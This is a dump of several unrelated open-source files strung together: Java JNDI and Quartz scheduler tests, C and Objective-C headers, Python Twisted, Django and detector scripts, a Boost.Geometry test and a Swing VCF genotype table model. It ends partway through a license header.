public Context getInitialContext(final Hashtable<?, ?> environment) {
return context;
}
}
/**
* JUnit statement that registers {@link SimpleInitialContextFactory} as initial context factory before running a
* test. As soon as a test is done, the initial context factory will be unregistered.
*/
private static final class ContextStatement extends Statement {
private final Statement base;
/**
* @param base
* Base statement the contains the test
*/
private ContextStatement(final Statement base) {
this.base = base;
}
@Override
public void evaluate() throws Throwable {
SimpleInitialContextFactory.context = new SimpleContext();
String property = System.getProperty(Context.INITIAL_CONTEXT_FACTORY);
System.setProperty(Context.INITIAL_CONTEXT_FACTORY, SimpleInitialContextFactory.class.getName());
try {
base.evaluate();
} finally {
if (property == null) {
System.clearProperty(Context.INITIAL_CONTEXT_FACTORY);
} else {
System.setProperty(Context.INITIAL_CONTEXT_FACTORY, property);
}
SimpleInitialContextFactory.context = null;
}
}
}
/**
* Simple context with basic methods for environment variables, bindings and lookups. The most other methods are not
* implemented and will throw an {@link UnsupportedOperationException}.
*/
private static final class SimpleContext implements Context {
private final Map<Name, Object> values;
private final Hashtable<Object, Object> environment;
/** */
private SimpleContext() {
values = new HashMap<>();
environment = new Hashtable<>();
}
@Override
public Object lookup(final Name name) throws NamingException {
synchronized (values) {
if (values.containsKey(name)) {
return values.get(name);
} else {
throw new NameNotFoundException();
}
}
}
@Override
public Object lookup(final String name) throws NamingException {
return lookup(new CompositeName(name));
}
@Override
public void bind(final Name name, final Object obj) {
synchronized (values) {
values.put(name, obj);
}
}
@Override
public void bind(final String name, final Object obj) throws NamingException {
bind(new CompositeName(name), obj);
}
@Override
public void rebind(final Name name, final Object obj) throws NamingException {
synchronized (values) {
if (values.containsKey(name)) {
values.put(name, obj);
} else {
throw new NameNotFoundException();
}
}
}
@Override
public void rebind(final String name, final Object obj) throws NamingException {
rebind(new CompositeName(name), obj);
}
@Override
public void unbind(final Name name) {
synchronized (values) {
values.remove(name);
}
}
@Override
public void unbind(final String name) throws NamingException {
unbind(new CompositeName(name));
}
@Override
public void rename(final Name oldName, final Name newName) throws NamingException {
synchronized (values) {
if (values.containsKey(oldName)) {
if (values.containsKey(newName)) {
throw new NameAlreadyBoundException();
} else {
values.put(newName, values.remove(oldName));
}
} else {
throw new NameNotFoundException();
}
}
}
@Override
public void rename(final String oldName, final String newName) throws NamingException {
rename(new CompositeName(oldName), new CompositeName(newName));
}
@Override
public NamingEnumeration<NameClassPair> list(final Name name) {
throw new UnsupportedOperationException();
}
@Override
public NamingEnumeration<NameClassPair> list(final String name) {
throw new UnsupportedOperationException();
}
@Override
public NamingEnumeration<Binding> listBindings(final Name name) {
throw new UnsupportedOperationException();
}
@Override
public NamingEnumeration<Binding> listBindings(final String name) {
throw new UnsupportedOperationException();
}
@Override
public void destroySubcontext(final Name name) {
throw new UnsupportedOperationException();
}
@Override
public void destroySubcontext(final String name) {
throw new UnsupportedOperationException();
}
@Override
public Context createSubcontext(final Name name) {
throw new UnsupportedOperationException();
}
@Override
public Context createSubcontext(final String name) {
throw new UnsupportedOperationException();
}
@Override
public Object lookupLink(final Name name) {
throw new UnsupportedOperationException();
}
@Override
public Object lookupLink(final String name) {
throw new UnsupportedOperationException();
}
@Override
public NameParser getNameParser(final Name name) {
throw new UnsupportedOperationException();
}
@Override
public NameParser getNameParser(final String name) {
throw new UnsupportedOperationException();
}
@Override
public Name composeName(final Name name, final Name prefix) {
throw new UnsupportedOperationException();
}
@Override
public String composeName(final String name, final String prefix) {
throw new UnsupportedOperationException();
}
@Override
public Object addToEnvironment(final String propName, final Object propVal) {
return environment.put(propName, propVal);
}
@Override
public Object removeFromEnvironment(final String propName) {
return environment.remove(propName);
}
@Override
public Hashtable<?, ?> getEnvironment() {
return new Hashtable<>(environment);
}
@Override
public void close() {
}
@Override
public String getNameInNamespace() {
throw new UnsupportedOperationException();
}
}
}
| 2,394 |
595 | <gh_stars>100-1000
/******************************************************************************
* Copyright (c) 2020 - 2021 Xilinx, Inc. All rights reserved.
* SPDX-License-Identifier: MIT
******************************************************************************/
/*****************************************************************************/
/**
*
* @file xplm_stl.h
*
* This file contains the header functions of wrapper Xilstl
*
* <pre>
* MODIFICATION HISTORY:
*
* Ver Who Date Changes
* ----- ---- -------- -------------------------------------------------------
* 1.00 rama 08/12/2020 Initial release
* 1.01 rama 03/22/2021 Updated hook for periodic STL execution and FTTI
* configuration
*
* </pre>
*
* @note
*
******************************************************************************/
#ifndef XPLM_STL_H
#define XPLM_STL_H
#ifdef __cplusplus
extern "C" {
#endif
#ifdef PLM_ENABLE_STL
/***************************** Include Files *********************************/
/************************** Constant Definitions *****************************/
#define DEFAULT_FTTI_TIME (90U)
/**************************** Type Definitions *******************************/
/***************** Macros (Inline Functions) Definitions *********************/
/************************** Function Prototypes ******************************/
int XPlm_StlInit(void);
int XPlm_PeriodicStlHook(void);
/************************** Variable Definitions *****************************/
#endif /* PLM_ENABLE_STL */
#ifdef __cplusplus
}
#endif
#endif /* XPLM_STL_H */
| 434 |
1,016 | package com.thinkbiganalytics.scheduler;
/*-
* #%L
* thinkbig-scheduler-quartz
* %%
* Copyright (C) 2017 ThinkBig Analytics
* %%
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* #L%
*/
import com.thinkbiganalytics.scheduler.model.DefaultTriggerIdentifier;
import com.thinkbiganalytics.scheduler.quartz.MockJob;
import org.junit.Before;
import org.junit.Test;
import org.mockito.Mock;
import org.mockito.Mockito;
import org.mockito.MockitoAnnotations;
import org.mockito.internal.util.reflection.Whitebox;
import org.quartz.JobDetail;
import org.quartz.JobKey;
import org.quartz.Scheduler;
import org.quartz.SchedulerException;
import org.quartz.Trigger;
import org.quartz.TriggerKey;
import org.quartz.impl.JobDetailImpl;
import org.quartz.impl.matchers.GroupMatcher;
import org.springframework.scheduling.quartz.SchedulerFactoryBean;
import java.util.ArrayList;
import java.util.Date;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import java.util.TimeZone;
import java.util.Vector;
import static junit.framework.Assert.assertEquals;
import static junit.framework.Assert.assertTrue;
import static junit.framework.TestCase.assertNotNull;
import static org.junit.Assert.fail;
import static org.mockito.Matchers.any;
import static org.mockito.Matchers.anyObject;
import static org.mockito.Matchers.eq;
import static org.mockito.Mockito.doThrow;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.times;
import static org.mockito.Mockito.verify;
import static org.mockito.Mockito.when;
public class QuartzSchedulerTest {
QuartzScheduler toTest;
@Mock
QuartzClusterMessageSender clusterMessageSender;
@Mock
QuartzClusterMessageReceiver clusterMessageReceiver;
@Mock
JobIdentifier jobIdentifier;
@Mock
SchedulerFactoryBean schedulerFactoryBean;
@Mock
Scheduler scheduler;
Runnable task = new Runnable() {
@Override
public void run() {
// TODO Auto-generated method stub
}
};
@Before
public void before() {
MockitoAnnotations.initMocks(this);
when(schedulerFactoryBean.getScheduler()).thenReturn(scheduler);
toTest = new QuartzScheduler();
toTest.schedulerFactoryBean = schedulerFactoryBean;
Whitebox.setInternalState(toTest, "clusterMessageSender", clusterMessageSender);
mockJobIdentifier("job-name", "group");
}
@Test
public void scheduleWithCronExpressionInTimeZoneTest() throws Exception {
mockJobIdentifier("job-name", "group");
toTest.scheduleWithCronExpressionInTimeZone(jobIdentifier, task, "0 0 12 * * ?",
TimeZone.getTimeZone("UTC"));
verify(jobIdentifier).getName();
verify(jobIdentifier, times(2)).getGroup();
}
@Test
public void scheduleTest() throws Exception {
mockJobIdentifier("job-name", "group");
toTest.schedule(jobIdentifier, task, new Date());
verify(scheduler).scheduleJob((JobDetail) any(), (Trigger) any());
}
@Test
public void scheduleAtFixedRateTest() throws Exception {
mockJobIdentifier("job-name", "group");
toTest.scheduleAtFixedRate(jobIdentifier, task, 1l);
verify(scheduler).scheduleJob((JobDetail) any(), (Trigger) any());
}
@Test
public void scheduleAtFixedRateTest2() throws Exception {
mockJobIdentifier("job-name", "group");
toTest.scheduleAtFixedRate(jobIdentifier, task, new Date(), 1l);
verify(scheduler).scheduleJob((JobDetail) any(), (Trigger) any());
}
@Test
public void startSchedulerTest() throws Exception {
toTest.startScheduler();
verify(scheduler).start();
doThrow(new SchedulerException()).when(scheduler).start();
try {
toTest.startScheduler();
} catch (final JobSchedulerException e) {
return;
}
fail();
}
@Test
public void pauseSchedulerTest() throws Exception {
toTest.pauseScheduler();
verify(scheduler).standby();
doThrow(new SchedulerException()).when(scheduler).standby();
try {
toTest.pauseScheduler();
} catch (final JobSchedulerException e) {
return;
}
fail();
}
@Test
public void triggerJobTest() throws Exception {
mockJobIdentifier("job-name", "group");
toTest.triggerJob(jobIdentifier);
verify(scheduler).triggerJob(eq(new JobKey("job-name", "group")));
doThrow(new SchedulerException()).when(scheduler).triggerJob((JobKey) any());
try {
toTest.triggerJob(jobIdentifier);
} catch (final JobSchedulerException e) {
return;
}
fail();
}
@SuppressWarnings({"rawtypes", "unchecked"})
@Test
public void pauseTriggersOnJobTest() throws Exception {
mockJobIdentifier("job-name", "group");
final List list = new ArrayList<Trigger>();
addMockTrigger(list, "trigger-key-name", "trigger-key-name");
when(scheduler.getTriggersOfJob(eq(new JobKey("job-name", "group")))).thenReturn(list);
toTest.pauseTriggersOnJob(jobIdentifier);
verify(scheduler).pauseTrigger(eq(new TriggerKey("trigger-key-name", "trigger-key-name")));
doThrow(new SchedulerException()).when(scheduler).getTriggersOfJob((JobKey) any());
try {
toTest.pauseTriggersOnJob(jobIdentifier);
} catch (final JobSchedulerException e) {
return;
}
fail();
}
@SuppressWarnings({"rawtypes", "unchecked"})
@Test
public void resumeTriggersOnJobTest() throws Exception {
mockJobIdentifier("job-name", "group");
final List list = new ArrayList<Trigger>();
addMockTrigger(list, "trigger-key-name", "trigger-key-name");
when(scheduler.getTriggersOfJob(eq(new JobKey("job-name", "group")))).thenReturn(list);
toTest.resumeTriggersOnJob(jobIdentifier);
verify(scheduler).resumeTrigger(eq(new TriggerKey("trigger-key-name", "trigger-key-name")));
doThrow(new SchedulerException()).when(scheduler).getTriggersOfJob((JobKey) any());
try {
toTest.resumeTriggersOnJob(jobIdentifier);
} catch (final JobSchedulerException e) {
return;
}
fail();
}
@Test
public void updateTriggerTest() throws Exception {
toTest.updateTrigger(new DefaultTriggerIdentifier("trigger-key-name", "trigger-key-name"),
"0 0 12 * * ?");
verify(scheduler).rescheduleJob(eq(new TriggerKey("trigger-key-name", "trigger-key-name")),
(Trigger) any());
doThrow(new SchedulerException()).when(scheduler).rescheduleJob((TriggerKey) any(),
(Trigger) any());
try {
toTest.updateTrigger(new DefaultTriggerIdentifier("trigger-key-name", "trigger-key-name"),
"0 0 12 * * ?");
} catch (final JobSchedulerException e) {
return;
}
fail();
}
@Test
public void deleteJobTest() throws Exception {
mockJobIdentifier("job-name", "group");
toTest.deleteJob(jobIdentifier);
verify(scheduler).deleteJob(eq(new JobKey("job-name", "group")));
doThrow(new SchedulerException()).when(scheduler).deleteJob((JobKey) any());
try {
toTest.deleteJob(jobIdentifier);
} catch (final JobSchedulerException e) {
return;
}
fail();
}
@Test
public void scheduleWithCronExpression() throws Exception {
mockJobIdentifier("job-name", "group");
toTest.scheduleWithCronExpression(jobIdentifier, task, "0 0 12 * * ?");
verify(jobIdentifier).getName();
verify(jobIdentifier, times(2)).getGroup();
}
@Test
public void testGetJobs() throws Exception {
Vector<String> jobGroupNames = new Vector<>();
jobGroupNames.add("group");
Mockito.when(scheduler.getJobGroupNames()).thenReturn(jobGroupNames);
Set<JobKey> set = new HashSet<>();
set.add(new JobKey("name", "group"));
Mockito.when(scheduler.getJobKeys((GroupMatcher) anyObject())).thenReturn(set);
Mockito.when(scheduler.getJobDetail((JobKey) anyObject())).thenReturn(new JobDetailImpl("name", "group", MockJob.class));
List v = new Vector<>();
addMockTrigger(v, "name", "group");
Mockito.when(scheduler.getTriggerState((TriggerKey) Mockito.anyObject())).thenReturn(Trigger.TriggerState.BLOCKED);
Mockito.when(scheduler.getTriggersOfJob((JobKey) anyObject())).thenReturn(v);
assertTrue(toTest.getJobs().size() == 1);
}
@Test
public void scheduleAtFixedDelayTest1() throws Exception {
mockJobIdentifier("job-name", "group");
toTest.scheduleWithFixedDelay(jobIdentifier, task, 0l);
verify(scheduler).scheduleJob((JobDetail) any(), (Trigger) any());
}
@Test
public void scheduleAtFixedRateWithDelayTest() throws Exception {
mockJobIdentifier("job-name", "group");
toTest.scheduleAtFixedRateWithDelay(jobIdentifier, task, "run", new Date(), 1l, 1L);
verify(scheduler).scheduleJob((JobDetail) any(), (Trigger) any());
}
@Test
public void scheduleAtFixedDelayTest2() throws Exception {
mockJobIdentifier("job-name", "group");
toTest.scheduleWithFixedDelay(jobIdentifier, task, new Date(), 0l);
verify(scheduler).scheduleJob((JobDetail) any(), (Trigger) any());
}
@Test
public void staticHelperTest() throws Exception {
JobIdentifier identifier = QuartzScheduler.jobIdentifierForJobKey(new JobKey("job-name", "group"));
JobKey jobKey = QuartzScheduler.jobKeyForJobIdentifier(identifier);
assertEquals(jobKey.getName(), identifier.getName());
TriggerKey triggerKey = new TriggerKey("trigger-key-name", "trigger-key-name");
TriggerIdentifier triggerIdentifier = QuartzScheduler.triggerIdentifierForTriggerKey(triggerKey);
triggerKey = QuartzScheduler.triggerKeyForTriggerIdentifier(triggerIdentifier);
assertEquals(triggerKey.getName(), triggerIdentifier.getName());
}
@Test
public void buildTriggerInfo() throws Exception {
JobDetailImpl detail = new JobDetailImpl();
detail.setName("job-name");
JobInfo info = toTest.buildJobInfo(detail);
assertNotNull(info);
}
@Test
public void scheduleAtFixedDelayTest3() throws Exception {
mockJobIdentifier("job-name", "group");
toTest.scheduleWithFixedDelay(jobIdentifier, task, "run", new Date(), 0l);
verify(scheduler).scheduleJob((JobDetail) any(), (Trigger) any());
}
@Test
public void controlTests() throws Exception {
toTest.pauseAll();
toTest.resumeAll();
toTest.getMetaData();
}
@Test
public void existsTests() throws Exception {
Set<JobKey> set = new HashSet<>();
set.add(new JobKey("name", "group"));
Mockito.when(scheduler.getJobKeys((GroupMatcher) anyObject())).thenReturn(set);
toTest.jobExists(jobIdentifier);
TriggerIdentifier triggerIdentifer = new DefaultTriggerIdentifier("trigger-key-name", "trigger-key-name");
toTest.triggerExists(triggerIdentifer);
toTest.resumeAll();
toTest.getMetaData();
}
private void mockJobIdentifier(String jobName, String groupName) {
when(jobIdentifier.getName()).thenReturn(jobName);
when(jobIdentifier.getGroup()).thenReturn(groupName);
}
@SuppressWarnings({"unchecked", "rawtypes"})
private void addMockTrigger(final List list, String triggerKeyName, String triggerKeyGroup) {
final Trigger trigger = mock(Trigger.class);
final TriggerKey triggerKey = new TriggerKey(triggerKeyName, triggerKeyGroup);
when(trigger.getKey()).thenReturn(triggerKey);
list.add(trigger);
}
}
| 5,088 |
750 | <reponame>paradiseng/jasmin
from twisted.web.resource import Resource
class Ping(Resource):
isleaf = True
def __init__(self, log):
Resource.__init__(self)
self.log = log
def render_GET(self, request):
"""
/ping request processing
Note: Ping is used to check Jasmin's http api
"""
self.log.debug("Rendering /ping response with args: %s from %s",
request.args, request.getClientIP())
self.log.info("Received ping from %s", request.getClientIP())
request.setResponseCode(200)
return b'Jasmin/PONG'
| 265 |
471 | from django.contrib import admin
from custom.m4change.models import McctStatus
class McctStatusAdmin(admin.ModelAdmin):
model = McctStatus
list_display = ('form_id', 'status', 'domain', 'reason', 'received_on', 'registration_date', 'immunized',
'is_booking', 'is_stillbirth', 'modified_on', 'user')
search_fields = ('form_id',)
admin.site.register(McctStatus, McctStatusAdmin)
| 153 |
1,144 | package de.metas.migration.cli.rollout_migrate;
import de.metas.migration.IDatabase;
import de.metas.migration.IScript;
import de.metas.migration.IScriptsRegistry;
import de.metas.migration.impl.SQLDatabase;
import lombok.AllArgsConstructor;
import lombok.NonNull;
/*
* #%L
* de.metas.migration.cli
* %%
* Copyright (C) 2017 metas GmbH
* %%
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as
* published by the Free Software Foundation, either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public
* License along with this program. If not, see
* <http://www.gnu.org/licenses/gpl-2.0.html>.
* #L%
*/
/**
* This class creates {@link IDatabase} instances.
*
* @author metas-dev <<EMAIL>>
*
*/
@AllArgsConstructor
class DBConnectionMaker
{
public IDatabase createDb(
@NonNull final DBConnectionSettings settings,
@NonNull final String dbName)
{
final IDatabase db = new SQLDatabase(
settings.getDbType(),
settings.getDbHostname(),
settings.getDbPort(),
dbName,
settings.getDbUser(),
settings.getDbPassword());
return db;
}
/**
* Creates an {@link IDatabase} instance we don't intend to run migration scripts against.
* However, connecting to that DB is possible.
*/
public IDatabase createDummyDatabase(
@NonNull final DBConnectionSettings settings,
@NonNull final String dbName)
{
// return a database that does not check whether our script was applied or not
return new SQLDatabase(
settings.getDbType(),
settings.getDbHostname(),
settings.getDbPort(),
dbName,
settings.getDbUser(),
settings.getDbPassword())
{
// @formatter:off
@Override
public IScriptsRegistry getScriptsRegistry()
{
return new IScriptsRegistry()
{
@Override public void markIgnored(final IScript script) { }
@Override public void markApplied(final IScript script) { }
@Override public boolean isApplied(final IScript script) { return false; }
};
};
// @formatter:on
};
}
}
| 818 |
12,718 | <filename>lib/libc/include/wasm-wasi-musl/wasi/libc.h
#ifndef __wasi_libc_h
#define __wasi_libc_h
#include <__typedef_off_t.h>
#include <__struct_timespec.h>
#ifdef __cplusplus
extern "C" {
#endif
struct stat;
struct timespec;
/// Register the given pre-opened file descriptor under the given path.
///
/// This function does not take ownership of `prefix` (it makes its own copy).
int __wasilibc_register_preopened_fd(int fd, const char *prefix);
/// Renumber `fd` to `newfd`; similar to `dup2` but does a move rather than a
/// copy.
int __wasilibc_fd_renumber(int fd, int newfd)
__attribute__((__warn_unused_result__));
/// Like `unlinkat`, but without depending on `__wasi_path_remove_directory`.
int __wasilibc_unlinkat(int fd, const char *path)
__attribute__((__warn_unused_result__));
/// An `*at` version of rmdir.
int __wasilibc_rmdirat(int fd, const char *path)
__attribute__((__warn_unused_result__));
/// Like `open`, but without the varargs in the signature.
int __wasilibc_open_nomode(const char *path, int oflag);
/// Like `openat`, but without the varargs in the signature.
int __wasilibc_openat_nomode(int fd, const char *path, int oflag);
/// Return the current file offset. Like `lseek(fd, 0, SEEK_CUR)`, but without
/// depending on `lseek`.
off_t __wasilibc_tell(int fd)
__attribute__((__warn_unused_result__));
/* Non-`at` forms of various `*at` functions. */
int __wasilibc_access(const char *pathname, int mode, int flags)
__attribute__((__warn_unused_result__));
int __wasilibc_stat(const char *__restrict pathname, struct stat *__restrict statbuf, int flags)
__attribute__((__warn_unused_result__));
int __wasilibc_utimens(const char *pathname, const struct timespec times[2], int flags)
__attribute__((__warn_unused_result__));
int __wasilibc_link(const char *oldpath, const char *newpath, int flags)
__attribute__((__warn_unused_result__));
int __wasilibc_link_oldat(int olddirfd, const char *oldpath, const char *newpath, int flags)
__attribute__((__warn_unused_result__));
int __wasilibc_link_newat(const char *oldpath, int newdirfd, const char *newpath, int flags)
__attribute__((__warn_unused_result__));
int __wasilibc_rename_oldat(int olddirfd, const char *oldpath, const char *newpath)
__attribute__((__warn_unused_result__));
int __wasilibc_rename_newat(const char *oldpath, int newdirfd, const char *newpath)
__attribute__((__warn_unused_result__));
#ifdef __cplusplus
}
#endif
#endif
| 895 |
355 | /*
The MIT License (MIT)
Copyright (c) 2021 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/
package com.github.lindenb.jvarkit.variant.swing;
import java.util.Arrays;
import java.util.Collections;
import java.util.List;
import java.util.Vector;
import java.util.function.Function;
import java.util.stream.Collectors;
import com.github.lindenb.jvarkit.pedigree.Pedigree;
import com.github.lindenb.jvarkit.pedigree.Sample;
import com.github.lindenb.jvarkit.pedigree.Status;
import com.github.lindenb.jvarkit.util.swing.AbstractGenericTable;
import htsjdk.variant.variantcontext.Genotype;
import htsjdk.variant.variantcontext.VariantContext;
import htsjdk.variant.vcf.VCFConstants;
@SuppressWarnings("serial")
public class SwingVCFGenotypesTableModel extends AbstractGenericTable<Genotype>{
private final Vector<ColumnInfo> columns = new Vector<>();
private final Pedigree pedigree;
private class ColumnInfo {
String name;
Class<?> clazz;
Function<Genotype, Object> extractor;
}
public SwingVCFGenotypesTableModel(final Pedigree pedigree) {
super();
this.pedigree=pedigree;
}
public void setVariant(final VariantContext ctx) {
final List<Genotype> genotypes;
if(ctx==null || !ctx.hasGenotypes()) {
genotypes = Collections.emptyList();
}
else {
genotypes = ctx.getGenotypes();
}
setRows(genotypes);
}
@Override
synchronized public void setRows(final List<Genotype> genotypes) {
if(genotypes==null) {
setRows(Collections.emptyList());
}
this.columns.clear();
final Vector<ColumnInfo> columns = new Vector<>();
ColumnInfo ci = new ColumnInfo();
ci.clazz = String.class;
ci.name= "Sample";
ci.extractor = GT->GT.getSampleName();
columns.add(ci);
if(this.pedigree!=null) {
ci = new ColumnInfo();
ci.clazz = String.class;
ci.name= "Status";
ci.extractor = GT->{
final Sample sn= this.pedigree.getSampleById(GT.getSampleName());
if( sn==null || !sn.isStatusSet()) return null;
if(sn.getStatus().equals(Status.affected)) return "[*]";
if(sn.getStatus().equals(Status.unaffected)) return "[ ]";
return null;
};
columns.add(ci);
}
if(genotypes.stream().anyMatch(G->G.isAvailable())) {
ci = new ColumnInfo();
ci.clazz = String.class;
ci.name= VCFConstants.GENOTYPE_KEY;
ci.extractor = GT->GT.getAlleles().stream().
map(A->A.getDisplayString()).
collect(Collectors.joining(GT.isPhased()?Genotype.PHASED_ALLELE_SEPARATOR:Genotype.UNPHASED_ALLELE_SEPARATOR));
columns.add(ci);
}
ci = new ColumnInfo();
ci.clazz = String.class;
ci.name= "Type";
ci.extractor = GT->GT.getType().name();
columns.add(ci);
if(genotypes.stream().anyMatch(G->G.hasDP())) {
ci = new ColumnInfo();
ci.clazz = String.class;
ci.name= VCFConstants.DEPTH_KEY;
ci.extractor = GT->GT.hasDP()?GT.getDP():null;
columns.add(ci);
}
if(genotypes.stream().anyMatch(G->G.hasGQ())) {
ci = new ColumnInfo();
ci.clazz = String.class;
ci.name= VCFConstants.GENOTYPE_QUALITY_KEY;
ci.extractor = GT->GT.hasGQ()?GT.getGQ():null;
columns.add(ci);
}
if(genotypes.stream().anyMatch(G->G.hasAD())) {
ci = new ColumnInfo();
ci.clazz = String.class;
ci.name= VCFConstants.GENOTYPE_ALLELE_DEPTHS;
ci.extractor = GT->GT.hasAD()?Arrays.stream(GT.getAD()).mapToObj(P->String.valueOf(P)).collect(Collectors.joining(",")):null;
columns.add(ci);
}
if(genotypes.stream().anyMatch(G->G.hasPL())) {
ci = new ColumnInfo();
ci.clazz = String.class;
ci.name= VCFConstants.GENOTYPE_PL_KEY;
ci.extractor = GT->GT.hasPL()?Arrays.stream(GT.getPL()).mapToObj(P->String.valueOf(P)).collect(Collectors.joining(",")):null;
columns.add(ci);
}
for(final String att: genotypes.stream().
flatMap(G->G.getExtendedAttributes().keySet().stream()).
collect(Collectors.toSet())) {
ci = new ColumnInfo();
ci.clazz = Object.class;
ci.name= att;
ci.extractor = GT->GT.hasExtendedAttribute(att)?GT.getExtendedAttribute(att):null;
columns.add(ci);
}
this.columns.addAll(columns);
super.rows.clear();
super.rows.addAll(genotypes);
fireTableStructureChanged();
}
@Override
public int getColumnCount() {
return this.columns.size();
}
@Override
public Class<?> getColumnClass(int column) {
return this.columns.get(column).clazz;
}
@Override
public String getColumnName(int column) {
return this.columns.get(column).name;
}
@Override
public Object getValueOf(final Genotype F, int column) {
return this.columns.get(column).extractor.apply(F);
}
}
| 2,396 |
594 | import json
import os
import glob
import dataconverter
# TODO adapt this method to get real detections on the given image.
# You have to stick to the given result format.
def mock_detector(image):
mock_detections = [{'x0': 0.0,
'x1': 10.0,
'y0': 0.0,
'y1': 100.0,
'score': 0.8,
'identity': 'pedestrian',
'orient': 0.0},
{'x0': 10.0,
'x1': 20.0,
'y0': 0.0,
'y1': 1000.0,
'score': 0.7,
'identity': 'rider',
'orient': 1.0}]
return mock_detections
def run_detector_on_dataset(time='day', mode='val'):
assert mode in ['val', 'test']
assert time in ['day', 'night']
eval_imgs = glob.glob('./data/{}/img/{}/*/*'.format(time, mode))
destdir = './data/mock_detections/{}/{}/'.format(time, mode)
dataconverter.create_base_dir(destdir)
for im in eval_imgs:
detections = mock_detector(im)
destfile = os.path.join(destdir, os.path.basename(im).replace('.png', '.json'))
frame = {'identity': 'frame'}
frame['children'] = detections
json.dump(frame, open(destfile, 'w'), indent=1)
if __name__ == "__main__":
run_detector_on_dataset(time='day', mode='val')
| 792 |
844 | <reponame>iprinceroyy/Hacktoberfest-2020
{
"github-username": "Fonta22",
"favourite-emoji": "🦠",
"favourite-music": "https://soundcloud.com/monstercat/noisestorm-crab-rave",
"favourite-color": "#FBFFBF"
}
| 94 |
326 | <filename>extensions/test/nsphere/nsphere-index_margin.cpp
// Boost.Geometry (aka GGL, Generic Geometry Library)
// Unit Test
// Copyright (c) 2007-2012 <NAME>, Amsterdam, the Netherlands.
// Copyright (c) 2013 <NAME>, Lodz, Poland.
// Use, modification and distribution is subject to the Boost Software License,
// Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
#include <geometry_test_common.hpp>
#include <boost/geometry/geometries/geometries.hpp>
#include <boost/geometry/strategies/strategies.hpp>
#include <boost/geometry/extensions/nsphere/nsphere.hpp>
template <typename P, typename T>
void test_comparable_margin_circle()
{
bg::model::nsphere<P, T> c;
bg::set<0>(c.center(), 0);
bg::set<1>(c.center(), 0);
c.radius(2);
double d = bg::index::detail::comparable_margin(c);
BOOST_CHECK_CLOSE(d, 2, 0.001);
}
template <typename P, typename T>
void test_comparable_margin_sphere()
{
bg::model::nsphere<P, T> s;
bg::set<0>(s, 0);
bg::set<1>(s, 0);
bg::set<2>(s, 0);
bg::set_radius<0>(s, 2);
double d = bg::index::detail::comparable_margin(s);
BOOST_CHECK_CLOSE(d, 4, 0.001);
}
int test_main(int, char* [])
{
test_comparable_margin_circle<bg::model::point<double, 2, bg::cs::cartesian>, double>();
test_comparable_margin_sphere<bg::model::point<double, 3, bg::cs::cartesian>, double>();
return 0;
}
| 589 |
7,744 | //
// ASContextTransitioning.h
// Texture
//
// Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
// Changes after 4/13/2017 are: Copyright (c) Pinterest, Inc. All rights reserved.
// Licensed under Apache 2.0: http://www.apache.org/licenses/LICENSE-2.0
//
#import <AsyncDisplayKit/ASDimension.h>
@class ASDisplayNode;
@class ASLayout;
NS_ASSUME_NONNULL_BEGIN
ASDK_EXTERN NSString * const ASTransitionContextFromLayoutKey;
ASDK_EXTERN NSString * const ASTransitionContextToLayoutKey;
@protocol ASContextTransitioning <NSObject>
/**
@abstract Defines if the given transition is animated
*/
- (BOOL)isAnimated;
/**
* @abstract Retrieve either the "from" or "to" layout
*/
- (nullable ASLayout *)layoutForKey:(NSString *)key;
/**
* @abstract Retrieve either the "from" or "to" constrainedSize
*/
- (ASSizeRange)constrainedSizeForKey:(NSString *)key;
/**
* @abstract Retrieve the subnodes from either the "from" or "to" layout
*/
- (NSArray<ASDisplayNode *> *)subnodesForKey:(NSString *)key;
/**
* @abstract Subnodes that have been inserted in the layout transition
*/
- (NSArray<ASDisplayNode *> *)insertedSubnodes;
/**
* @abstract Subnodes that will be removed in the layout transition
*/
- (NSArray<ASDisplayNode *> *)removedSubnodes;
/**
@abstract The frame for the given node before the transition began.
@discussion Returns CGRectNull if the node was not in the hierarchy before the transition.
*/
- (CGRect)initialFrameForNode:(ASDisplayNode *)node;
/**
@abstract The frame for the given node when the transition completes.
@discussion Returns CGRectNull if the node is no longer in the hierarchy after the transition.
*/
- (CGRect)finalFrameForNode:(ASDisplayNode *)node;
/**
@abstract Invoke this method when the transition is completed in `animateLayoutTransition:`
@discussion Passing NO to `didComplete` will set the original layout as the new layout.
*/
- (void)completeTransition:(BOOL)didComplete;
@end
NS_ASSUME_NONNULL_END
| 619 |
1,056 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
